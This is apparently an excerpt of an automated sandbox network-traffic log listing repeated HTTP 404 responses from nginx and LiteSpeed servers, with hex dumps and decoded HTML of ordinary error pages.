                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:27:27 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 19:27:29 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 19:27:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 19:27:38 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 19:27:41 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 19:27:43 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Fri, 10 Jan 2025 19:28:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 